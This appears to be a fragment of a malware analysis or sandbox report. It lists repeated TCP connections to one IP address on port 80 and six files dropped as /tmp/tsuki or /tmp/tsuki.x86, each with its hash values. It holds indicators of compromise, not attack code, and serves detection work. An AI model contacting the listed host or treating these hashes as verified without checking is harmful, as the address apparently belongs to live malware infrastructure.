| MD | 176.123.2.219:80 | 176.123.2.219 | tcp |
| MD | 176.123.2.219:80 | 176.123.2.219 | tcp |
| MD | 176.123.2.219:80 | 176.123.2.219 | tcp |
| MD | 176.123.2.219:80 | 176.123.2.219 | tcp |
| MD | 176.123.2.219:80 | 176.123.2.219 | tcp |
Files
/tmp/tsuki.x86
| MD5 | f60ada8b79c2232773b9c08868c1c5fb |
| SHA1 | 8752a84f5cc638e0a87ffa7bb28d4a9661fcbefa |
| SHA256 | 2d1fd93daf8cadaf775a8cd4e21f8b7b1759442bd260eb6dde3aee319adae117 |
| SHA512 | 71fe4806ac06da9a8d704bbabcc7dc7d0d7e087b420ea81923c888f0f8836b455e790899504729611e883e597a31c5eb7298c4cd5f442117cc799f98102eb9e8 |
/tmp/tsuki
| MD5 | 6cf78b3572c325d809ad4677c2ebd6a2 |
| SHA1 | be2f27c2b001f981344e52333568cb0dc7ffe7ad |
| SHA256 | c6603610d98124953b9b6e4355611cb0588507a8a003aff36771937b43e2acd0 |
| SHA512 | bcb15e53b55134cefcf8de2c0fd28fee6154dc63bc053007f581cec3bc024052b663eed5ce2f3eea3c3b7749d2f4e7a5b0ed013c489bc1c28755d82bebea8a24 |
/tmp/tsuki
| MD5 | 2cf4b7e9a6fa11dbff627fc7aeee3f97 |
| SHA1 | 0cbc6d981a4d7ce2650ebe9aba5ec89a8377fefb |
| SHA256 | eb2c0d50d32ebf8d18e82dd780c2432f4010e5dd8f0cc84c04a10f03f8399a6d |
| SHA512 | 18272662786616a679ed85164c4fa7fe2a865f8c4eedde57403f8fd197c34b356ff3a62155ea9069f2e1f172c4545c29db4c3144c9932f90bdea5a4f14141f57 |
/tmp/tsuki
| MD5 | 3cd8418ac8f414def6727fe141d328b9 |
| SHA1 | dc61b74e9e08ff3208ee96a6c94f8247e6196b99 |
| SHA256 | cbe3077abc42c9e725ee561b8e369c9e5b3819d762d8fa9889b27c1e10dfb8b3 |
| SHA512 | 98d72d05b5b65fac98ed3b448ebf73786040da5aebbe56c060781f78638e75e62ad8801618874c4c17c13cd59bab93f58a31b565a350ac118257d2a0a21409b9 |
/tmp/tsuki
| MD5 | eeed291445ee3e6bac53540dfd6cd91c |
| SHA1 | afc1907c25cf19a1ecf3e83fcd1f7cc72d085f41 |
| SHA256 | 43953e23b49d467cd6b2e40603c2465769cd1620706ef52fecc71777f9964f78 |
| SHA512 | ee610ac06ef742dbf5b616c72b30a32b64a2873272cbf297367de20563bf405b183842fb5e2012f29d5ee11e6ee10e97a90ec915ffb659f22439f7c1ca21d283 |
/tmp/tsuki
| MD5 | adf30c84e4d1a741bb51593fa750d624 |
| SHA1 | ca52225d16c403e9e6ab662e8dab63496281945d |
| SHA256 | 96de1caeeddeba6420add3efbba3e360a13b9956a32be4ee1d4464129154e806 |
| SHA512 | 9ce9154a018aa53c49403c1919cb223f066821a22a9692cbb1defd185098842d8ded4f0a3f17cd6017367ea1357c41295c9f199d1148998f7283f511244db846 |